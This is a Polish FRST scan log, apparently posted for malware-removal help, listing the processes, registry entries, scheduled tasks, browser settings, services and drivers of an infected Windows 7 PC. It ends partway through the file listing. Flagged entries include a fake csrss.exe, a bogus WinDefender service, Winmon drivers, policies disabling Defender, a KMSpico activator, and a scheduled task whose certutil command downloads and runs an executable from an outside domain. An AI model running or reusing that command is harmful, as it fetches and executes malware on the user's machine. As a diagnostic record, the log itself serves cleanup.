Rezultaty skanowania Farbar Recovery Scan Tool (FRST) (x64) Wersja: 21-08-2021 Uruchomiony przez Kratex (administrator) KRATEX-KOMPUTER (Gigabyte Technology Co., Ltd. B85M-D3H) (28-08-2021 10:48:05) Uruchomiony z C:\Users\Kratex\Desktop Załadowane profile: Kratex Platform: Windows 7 Home Premium Service Pack 1 (X64) Język: Polski (Polska) Domyślna przeglądarka: FF Tryb startu: Normal ==================== Procesy (filtrowane) ================= (Załączenie wejścia w fixlist spowoduje zamknięcie procesu. Powiązany plik nie zostanie przeniesiony.) () [Brak podpisu cyfrowego] C:\Program Files (x86)\Gigabyte\AppCenter\AdjustService.exe () [Brak podpisu cyfrowego] C:\Users\Kratex\AppData\Local\Temp\csrss\nupload05053.exe (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe (Autodesk, Inc. -> Autodesk Inc.) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe (AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Users\Kratex\Desktop\DAEMON Tools Lite\DiscSoftBusServiceLite.exe (AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Users\Kratex\Desktop\DAEMON Tools Lite\DTShellHlp.exe (F.lux Software LLC -> f.lux Software LLC) C:\Users\Kratex\AppData\Local\FluxSoftware\Flux\flux.exe (Flexera Software LLC -> Flexera Software LLC) C:\Program Files\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService64.exe (GIGA-BYTE TECHNOLOGY CO., LTD. -> ) C:\Program Files (x86)\Gigabyte\AppCenter\ApCent.exe (Intel Corporation - pGFX -> ) C:\Windows\System32\igfxTray.exe (Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxCUIService.exe (Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxEM.exe (Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxHK.exe (Logitech Inc -> Logitech) C:\Program Files\Logitech\Collaboration\Services\Video\ServiceLayer.exe (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE (Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe (Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe <7> (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2> (Piriform Software Ltd -> Piriform Software Ltd) C:\Program Files\CCleaner\CCleaner64.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe ==================== Rejestr (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci. Powiązany plik nie zostanie przeniesiony.) HKLM\...\Run: [AvastUI.exe] => C:\Program Files\Avast Software\Avast\AvLaunch.exe [124184 2021-08-28] (Avast Software s.r.o. -> AVAST Software) HKLM-x32\...\RunOnce: [PreRun] => C:\Program Files (x86)\Gigabyte\AppCenter\PreRun.exe [8192 2013-04-29] () [Brak podpisu cyfrowego] HKLM-x32\...\RunOnce: [AvRepair] => C:\Program Files\Avast Software\Avast\setup\instup.exe [3462472 2021-08-19] (Avast Software s.r.o. -> AVAST Software) HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA HKU\S-1-5-21-2441695171-927743616-401218213-1000\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize HKU\S-1-5-21-2441695171-927743616-401218213-1000\...\Run: [f.lux] => C:\Users\Kratex\AppData\Local\FluxSoftware\Flux\flux.exe [1515848 2021-06-18] (F.lux Software LLC -> f.lux Software LLC) HKU\S-1-5-21-2441695171-927743616-401218213-1000\...\Run: [FloralWater] => C:\Windows\rss\csrss.exe [4647936 2021-08-27] () [Brak podpisu cyfrowego] <==== UWAGA HKU\S-1-5-21-2441695171-927743616-401218213-1000\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [35144320 2021-08-16] (Piriform Software Ltd -> Piriform Software Ltd) HKU\S-1-5-21-2441695171-927743616-401218213-1000\...\Policies\Explorer: [] HKLM\...\Windows x64\Print Processors\Canon MP230 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPDB5.DLL [30208 2012-03-26] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.) HKLM\...\Print\Monitors\Canon BJ Language Monitor MP230 series: C:\Windows\system32\CNMLMB5.DLL [389120 2012-03-26] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.) HKLM\...\Print\Monitors\PDF-XChange: C:\Windows\system32\pxc35pm.dll [6656 2006-01-30] (Tracker Software) [Brak podpisu cyfrowego] HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\92.0.4515.159\Installer\chrmstp.exe [2021-08-17] (Google LLC -> Google LLC) HKLM\SOFTWARE\Policies\Mozilla\Firefox: Ograniczenia <==== UWAGA ==================== Zaplanowane zadania (filtrowane) ============ (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {0B7F87F1-DAF5-4FA4-A084-F77005A096DA} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4647936 2021-08-27] () [Brak podpisu cyfrowego] <==== UWAGA Task: {14634A03-DABF-40AD-8D42-1A8D4BAED19C} - System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(1): schtasks.exe -> /Change /TN "\Adobe Acrobat Update Task" /ENABLE Task: {14634A03-DABF-40AD-8D42-1A8D4BAED19C} - System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(2): schtasks.exe -> /Change /TN "\AutoPico Daily Restart" /ENABLE Task: {14634A03-DABF-40AD-8D42-1A8D4BAED19C} - System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(3): schtasks.exe -> /Change /TN "\Driver Booster Scheduler" /ENABLE Task: {14634A03-DABF-40AD-8D42-1A8D4BAED19C} - System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(4): schtasks.exe -> /Change /TN "\Driver Booster SkipUAC (Kratex)" /ENABLE Task: {14634A03-DABF-40AD-8D42-1A8D4BAED19C} - System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(5): schtasks.exe -> /Change /TN "\Driver Booster Update" /ENABLE Task: {14634A03-DABF-40AD-8D42-1A8D4BAED19C} - System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(6): schtasks.exe -> /Change /TN "\GoogleUpdateTaskMachineCore" /ENABLE Task: {14634A03-DABF-40AD-8D42-1A8D4BAED19C} - System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(7): schtasks.exe -> /Change /TN "\GoogleUpdateTaskMachineUA" /ENABLE Task: {14634A03-DABF-40AD-8D42-1A8D4BAED19C} - System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(8): schtasks.exe -> /Change /TN "\AVAST Software\Gaming mode Task Scheduler recovery" /DISABLE Task: {17E99E8B-275A-45F0-AD8D-1E6E59A3A100} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation) Task: {1A6DD204-6ADA-4812-8915-DE174A93936C} - System32\Tasks\{D19E2F49-6973-4414-8465-2E4CE15D9AE0} => E:\Program Files (x86)\The Sims 4 Cottage Living\Game\Bin\TS4_x64.exe Task: {5558CA42-2EFB-48C8-9303-3D86BBE7BEB8} - System32\Tasks\{F71ED945-6E64-4AEE-8156-3C0D05DBC94A} => C:\Program Files\Avast Software\Avast\AvastUI.exe [12773656 2021-08-28] (Avast Software s.r.o. -> AVAST Software) Task: {63782042-E067-4D79-9FA7-D726632F2BBB} - System32\Tasks\Avast Emergency Update => C:\Program Files\Avast Software\Avast\AvEmUpdate.exe [4917528 2021-08-28] (Avast Software s.r.o. -> AVAST Software) Task: {65794ABA-9252-4BCC-8178-0511C9F883F0} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Kratex\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Kratex\AppData\Local\Temp\csrss\scheduled.exe /31340 -> /C certutil.exe -urlcache -split -f hxxps://spolaect.info/app/app.exe C:\Users\Kratex\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Kratex\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA Task: {78A1C563-2319-4E9C-89BF-C1160DB39E21} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [1790184 2021-08-28] (Avast Software s.r.o. -> Avast Software) Task: {7BB5DB18-C3CE-4E26-B390-9D5F9D784688} - System32\Tasks\CCleanerSkipUAC - Kratex => C:\Program Files\CCleaner\CCleaner.exe [29211264 2021-08-16] (Piriform Software Ltd -> Piriform Software Ltd) Task: {943B575A-D5C4-4DC9-A37E-241314E130CB} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154920 2020-09-21] (Google Inc -> Google LLC) Task: {A1CD665E-4367-4FCB-9339-124F12ACBD9E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154920 2020-09-21] (Google Inc -> Google LLC) Task: {B3003C52-310A-4210-87F1-3358445B6A9A} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [316632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation) Task: {B88B3D62-C897-4DE8-8465-A8DC43F1396B} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [684976 2021-08-16] (Piriform Software Ltd -> Piriform) Task: {D124817D-CA27-4828-B08D-1D0C80B5ED84} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation) Task: {D299F07D-35CD-41A1-9AE0-CD6BB462F9F9} - System32\Tasks\{87695F4A-5722-4700-AF20-91F9B74BB394} => E:\Program Files (x86)\The Sims 4 Cottage Living\Game\Bin\TS4_x64.exe Task: {D97C04DB-D449-42F1-8E8B-66FFE6135F88} - System32\Tasks\{CBA2B0A4-A23C-4644-8AAB-C5134DF7C3D2} => C:\Program Files\Avast Software\Avast\AvastUI.exe [12773656 2021-08-28] (Avast Software s.r.o. -> AVAST Software) Task: {DD892BDF-AD36-4889-94DB-1D1601907B0E} - System32\Tasks\AutoPico Daily Restart => C:\Program Files\KMSpico\AutoPico.exe Task: {F49F6094-A721-4CE8-B3EA-554A339C75E4} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1557200 2021-01-25] (Adobe Inc. -> Adobe Inc.) (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) ==================== Internet (filtrowane) ==================== (Załączenie wejścia w fixlist, w przypadku gdy jest to obiekt rejestru, spowoduje usunięcie go z rejestru lub przywrócenie jego domyślnej postaci.) Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 0.0.0.0 Tcpip\..\Interfaces\{DAC85019-AC4A-4602-BEBE-8F646771B9F3}: [DhcpNameServer] 192.168.0.1 0.0.0.0 Tcpip\..\Interfaces\{DF50D3D7-E3FE-4821-A8FD-26476B43EE77}: [DhcpNameServer] 192.168.0.1 0.0.0.0 FireFox: ======== FF DefaultProfile: hl64k77s.default FF ProfilePath: C:\Users\Kratex\AppData\Roaming\Mozilla\Firefox\Profiles\zrgpy9bc.default-release-1-1626519280914 [2021-08-28] FF ProfilePath: C:\Users\Kratex\AppData\Roaming\Mozilla\Firefox\Profiles\hl64k77s.default [2021-08-28] FF Homepage: Mozilla\Firefox\Profiles\hl64k77s.default -> hxxps://www.google.com/ FF NewTab: Mozilla\Firefox\Profiles\hl64k77s.default -> hxxps://securesearch.org/homepage?hp=2&pId=BT170603&iDate=2020-09-21 06:22:19&bName= FF Extension: (Facebook Container) - C:\Users\Kratex\AppData\Roaming\Mozilla\Firefox\Profiles\hl64k77s.default\Extensions\@contain-facebook.xpi [2021-07-04] FF Extension: (Easy Youtube Video Downloader Express) - C:\Users\Kratex\AppData\Roaming\Mozilla\Firefox\Profiles\hl64k77s.default\Extensions\{b9acf540-acba-11e1-8ccb-001fd0e08bd4}.xpi [2021-07-14] FF Extension: (Video DownloadHelper) - C:\Users\Kratex\AppData\Roaming\Mozilla\Firefox\Profiles\hl64k77s.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2021-07-04] FF Extension: (Adblock Plus - darmowy adblocker) - C:\Users\Kratex\AppData\Roaming\Mozilla\Firefox\Profiles\hl64k77s.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2021-07-04] FF ProfilePath: C:\Users\Kratex\AppData\Roaming\Mozilla\Firefox\Profiles\y9fjo8ye.default-release [2021-08-28] FF Homepage: Mozilla\Firefox\Profiles\y9fjo8ye.default-release -> hxxps://www.google.com/ FF NewTab: Mozilla\Firefox\Profiles\y9fjo8ye.default-release -> hxxps://securesearch.org/homepage?hp=2&pId=BT170603&iDate=2020-09-21 06:22:19&bName= FF Notifications: Mozilla\Firefox\Profiles\y9fjo8ye.default-release -> hxxps://mail.google.com FF Extension: (Facebook Container) - C:\Users\Kratex\AppData\Roaming\Mozilla\Firefox\Profiles\y9fjo8ye.default-release\Extensions\@contain-facebook.xpi [2021-05-08] FF Extension: (MyJDownloader Browser Extension) - C:\Users\Kratex\AppData\Roaming\Mozilla\Firefox\Profiles\y9fjo8ye.default-release\Extensions\jid1-OY8Xu5BsKZQa6A@jetpack.xpi [2021-06-25] [UpdateUrl:hxxps://my.jdownloader.org/extensions/firefox.json] FF Extension: (Avast Passwords) - C:\Users\Kratex\AppData\Roaming\Mozilla\Firefox\Profiles\y9fjo8ye.default-release\Extensions\jid1-r1tDuNiNb4SEww@jetpack.xpi [2020-09-24] [UpdateUrl:hxxps://pamcdn.avast.com/pamcdn/extensions/firefox/update.json] FF Extension: (Easy Youtube Video Downloader Express) - C:\Users\Kratex\AppData\Roaming\Mozilla\Firefox\Profiles\y9fjo8ye.default-release\Extensions\{b9acf540-acba-11e1-8ccb-001fd0e08bd4}.xpi [2021-06-22] FF Extension: (Video DownloadHelper) - C:\Users\Kratex\AppData\Roaming\Mozilla\Firefox\Profiles\y9fjo8ye.default-release\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2021-07-01] FF Extension: (Adblock Plus - darmowy adblocker) - C:\Users\Kratex\AppData\Roaming\Mozilla\Firefox\Profiles\y9fjo8ye.default-release\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2021-05-21] FF ProfilePath: C:\Users\Kratex\AppData\Roaming\Mozilla\Firefox\Profiles\r97p05ck.default-release-2 [2021-08-28] FF Homepage: Mozilla\Firefox\Profiles\r97p05ck.default-release-2 -> hxxps://www.google.com/ FF Extension: (Facebook Container) - C:\Users\Kratex\AppData\Roaming\Mozilla\Firefox\Profiles\r97p05ck.default-release-2\Extensions\@contain-facebook.xpi [2021-08-03] FF Extension: (MyJDownloader Browser Extension) - C:\Users\Kratex\AppData\Roaming\Mozilla\Firefox\Profiles\r97p05ck.default-release-2\Extensions\jid1-OY8Xu5BsKZQa6A@jetpack.xpi [2021-08-26] [UpdateUrl:hxxps://my.jdownloader.org/extensions/firefox.json] FF Extension: (Polski Language Pack) - C:\Users\Kratex\AppData\Roaming\Mozilla\Firefox\Profiles\r97p05ck.default-release-2\Extensions\langpack-pl@firefox.mozilla.org.xpi [2021-07-17] FF Extension: (Polish Spellchecker Dictionary) - C:\Users\Kratex\AppData\Roaming\Mozilla\Firefox\Profiles\r97p05ck.default-release-2\Extensions\pl@dictionaries.addons.mozilla.org.xpi [2021-07-17] FF Extension: (Easy Youtube Video Downloader Express) - C:\Users\Kratex\AppData\Roaming\Mozilla\Firefox\Profiles\r97p05ck.default-release-2\Extensions\{b9acf540-acba-11e1-8ccb-001fd0e08bd4}.xpi [2021-08-02] FF Extension: (Video DownloadHelper) - C:\Users\Kratex\AppData\Roaming\Mozilla\Firefox\Profiles\r97p05ck.default-release-2\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2021-07-17] FF Extension: (Adblock Plus - darmowy adblocker) - C:\Users\Kratex\AppData\Roaming\Mozilla\Firefox\Profiles\r97p05ck.default-release-2\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2021-07-27] FF Plugin: @microsoft.com/GENUINE -> disabled [Brak pliku] FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation) FF Plugin: @videolan.org/vlc,version=3.0.11 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2021-05-10] (VideoLAN -> VideoLAN) FF Plugin: @videolan.org/vlc,version=3.0.14 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2021-05-10] (VideoLAN -> VideoLAN) FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Brak pliku] FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-03-24] (NVIDIA Corporation PE Sign v2016 -> NVIDIA Corporation) [Brak podpisu cyfrowego] FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-03-24] (NVIDIA Corporation PE Sign v2016 -> NVIDIA Corporation) [Brak podpisu cyfrowego] FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2021-07-24] (Adobe Inc. -> Adobe Systems Inc.) Chrome: ======= CHR Profile: C:\Users\Kratex\AppData\Local\Google\Chrome\User Data\Default [2021-08-28] CHR StartupUrls: Default -> "chrome://apps/","hxxps://www.google.com/" CHR Extension: (Adblock Plus - darmowy adblocker) - C:\Users\Kratex\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2021-08-25] CHR Extension: (Set password for your browser ( chrome lock )) - C:\Users\Kratex\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjmjgijhapgicbhmniemjkjeaedanank [2021-08-25] CHR Extension: (Anti Testportal) - C:\Users\Kratex\AppData\Local\Google\Chrome\User Data\Default\Extensions\dpgfbfopkfdfmlfdpmoanamopdnibhkl [2021-02-13] CHR Extension: (Video Downloader professional) - C:\Users\Kratex\AppData\Local\Google\Chrome\User Data\Default\Extensions\elicpjhcidhpjomhibiffojpinpmmpil [2021-08-25] CHR Extension: (Avast Passwords) - C:\Users\Kratex\AppData\Local\Google\Chrome\User Data\Default\Extensions\emhginjpijfggbofeediiojmdlmlkoik [2021-08-25] CHR Extension: (Rozszerzenie Cisco Webex) - C:\Users\Kratex\AppData\Local\Google\Chrome\User Data\Default\Extensions\jlhmfgmfgeifomenelglieieghnjghma [2021-08-25] CHR Extension: (Płatności w sklepie Chrome Web Store) - C:\Users\Kratex\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-02-13] CHR Extension: (Chrome Media Router) - C:\Users\Kratex\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2021-07-26] ==================== Usługi (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) R2 AdAppMgrSvc; C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe [1364904 2018-01-11] (Autodesk, Inc. -> Autodesk Inc.) R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [169672 2021-01-25] (Adobe Inc. -> Adobe Inc.) S3 aswbIDSAgent; C:\Program Files\Avast Software\Avast\aswidsagent.exe [8303184 2021-08-28] (Avast Software s.r.o. -> AVAST Software) S2 avast! Antivirus; C:\Program Files\Avast Software\Avast\AvastSvc.exe [630040 2021-08-28] (Avast Software s.r.o. -> AVAST Software) S2 avast! Tools; C:\Program Files\Avast Software\Avast\aswToolsSvc.exe [377624 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R3 Disc Soft Lite Bus Service; C:\Users\Kratex\Desktop\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [4581568 2020-09-23] (AVB Disc Soft, SIA -> Disc Soft Ltd) R2 gadjservice; C:\Program Files (x86)\Gigabyte\AppCenter\AdjustService.exe [16896 2015-04-14] () [Brak podpisu cyfrowego] R2 nebula; C:\Program Files\Logitech\Collaboration\Services\Video\ServiceLayer.exe [4490376 2020-09-18] (Logitech Inc -> Logitech) R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [12871464 2021-04-29] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Windows -> Microsoft Corporation) R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] (Odmowa dostępu) <==== UWAGA (Odmowa dostępu) <==== UWAGA S2 Service KMSELDI; C:\Program Files\KMSpico\Service_KMS.exe [X] ===================== Sterowniki (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) R0 aswArDisk; C:\Windows\System32\drivers\aswArDisk.sys [35712 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R1 aswArPot; C:\Windows\System32\drivers\aswArPot.sys [221584 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R1 aswbidsdriver; C:\Windows\System32\drivers\aswbidsdriver.sys [367632 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R0 aswbidsh; C:\Windows\System32\drivers\aswbidsh.sys [250384 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R0 aswbuniv; C:\Windows\System32\drivers\aswbuniv.sys [99344 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R1 aswKbd; C:\Windows\System32\drivers\aswKbd.sys [41344 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R1 aswMonFlt; C:\Windows\System32\drivers\aswMonFlt.sys [184120 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R1 aswNetHub; C:\Windows\System32\drivers\aswNetHub.sys [538464 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R3 aswNetNd6; C:\Windows\System32\DRIVERS\aswNetNd6.sys [38152 2021-08-28] (AVAST Software s.r.o. -> AVAST Software) R1 aswRdr; C:\Windows\System32\drivers\aswRdr2.sys [107840 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R0 aswRvrt; C:\Windows\System32\drivers\aswRvrt.sys [82904 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R1 aswSnx; C:\Windows\System32\drivers\aswSnx.sys [851704 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R1 aswSP; C:\Windows\System32\drivers\aswSP.sys [553496 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R2 aswStm; C:\Windows\System32\drivers\aswStm.sys [215384 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R0 aswVmm; C:\Windows\System32\drivers\aswVmm.sys [328560 2021-08-28] (Avast Software s.r.o. -> AVAST Software) R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [42256 2020-09-23] (AVB Disc Soft, SIA -> Disc Soft Ltd) R3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [59360 2020-09-23] (AVB Disc Soft, SIA -> Disc Soft Ltd) R3 gdrv; C:\Windows\gdrv.sys [26192 2021-08-28] (Giga-Byte Technology -> Windows (R) Server 2003 DDK provider) R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [27552 2020-09-28] (Martin Malik - REALiX -> REALiX(tm)) R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 0000-00-00] () <==== UWAGA (zerobajtowy plik/folder) R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows (R) Win 7 DDK provider) <==== UWAGA (zerobajtowy plik/folder) R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2021-08-27] (WDKTestCert Admin,131666266076831434 -> ) [Brak podpisu cyfrowego] <==== UWAGA ==================== NetSvcs (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) ==================== Jeden miesiąc (utworzone) (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.) 2021-08-28 10:47 - 2021-08-28 10:47 - 000909824 _____ (Farbar) C:\Users\Kratex\Desktop\FSS.exe 2021-08-28 10:43 - 2021-08-28 10:43 - 000031401 _____ C:\Users\Kratex\Desktop\Addition.txt 2021-08-28 10:42 - 2021-08-28 10:48 - 000023353 _____ C:\Users\Kratex\Desktop\FRST.txt 2021-08-28 10:42 - 2021-08-28 10:48 - 000000000 ____D C:\FRST 2021-08-28 10:41 - 2021-08-28 10:41 - 002300928 _____ (Farbar) C:\Users\Kratex\Desktop\FRST64.exe 2021-08-28 10:38 - 2021-08-28 10:38 - 000000000 ___DC C:\Users\Kratex\AppData\Local\MigWiz 2021-08-28 10:31 - 2021-08-28 10:04 - 000340248 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe 2021-08-28 10:28 - 2021-08-28 10:28 - 000002980 _____ C:\Windows\system32\Tasks\{F71ED945-6E64-4AEE-8156-3C0D05DBC94A} 2021-08-28 10:28 - 2021-08-28 10:28 - 000002980 _____ C:\Windows\system32\Tasks\{CBA2B0A4-A23C-4644-8AAB-C5134DF7C3D2} 2021-08-28 10:26 - 2021-08-28 10:26 - 000000000 ____D C:\Users\Kratex\AppData\Local\AvgSetupLog 2021-08-28 10:26 - 2021-08-28 10:26 - 000000000 ____D C:\Users\Kratex\AppData\Local\Avg 2021-08-28 10:26 - 2021-08-28 10:26 - 000000000 ____D C:\ProgramData\Avg 2021-08-28 10:05 - 2021-08-28 10:31 - 000001882 _____ C:\Users\Public\Desktop\Avast Free Antivirus.lnk 2021-08-28 10:05 - 2021-08-28 10:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVAST Software 2021-08-28 10:05 - 2021-08-28 10:04 - 000851704 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys 2021-08-28 10:05 - 2021-08-28 10:04 - 000553496 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys 2021-08-28 10:05 - 2021-08-28 10:04 - 000538464 _____ (AVAST Software) C:\Windows\system32\Drivers\aswNetHub.sys 2021-08-28 10:05 - 2021-08-28 10:04 - 000367632 _____ (AVAST Software) C:\Windows\system32\Drivers\aswbidsdriver.sys 2021-08-28 10:05 - 2021-08-28 10:04 - 000328560 _____ (AVAST Software) C:\Windows\system32\Drivers\aswVmm.sys 2021-08-28 10:05 - 2021-08-28 10:04 - 000250384 _____ (AVAST Software) C:\Windows\system32\Drivers\aswbidsh.sys 2021-08-28 10:05 - 2021-08-28 10:04 - 000221584 _____ (AVAST Software) C:\Windows\system32\Drivers\aswArPot.sys 2021-08-28 10:05 - 2021-08-28 10:04 - 000215384 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys 2021-08-28 10:05 - 2021-08-28 10:04 - 000184120 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys 2021-08-28 10:05 - 2021-08-28 10:04 - 000107840 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys 2021-08-28 10:05 - 2021-08-28 10:04 - 000099344 _____ (AVAST Software) C:\Windows\system32\Drivers\aswbuniv.sys 2021-08-28 10:05 - 2021-08-28 10:04 - 000082904 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys 2021-08-28 10:05 - 2021-08-28 10:04 - 000041344 _____ (AVAST Software) C:\Windows\system32\Drivers\aswKbd.sys 2021-08-28 10:05 - 2021-08-28 10:04 - 000035712 _____ (AVAST Software) C:\Windows\system32\Drivers\aswArDisk.sys 2021-08-28 10:04 - 2021-08-28 10:04 - 000038152 _____ (AVAST Software) C:\Windows\system32\Drivers\aswNetNd6.sys 2021-08-28 10:04 - 2021-08-28 10:04 - 000000000 ____D C:\Program Files\Common Files\Avast Software 2021-08-28 10:04 - 2021-08-28 10:04 - 000000000 ____D C:\Program Files\Avast Software 2021-08-28 10:03 - 2021-08-28 10:03 - 714954024 _____ 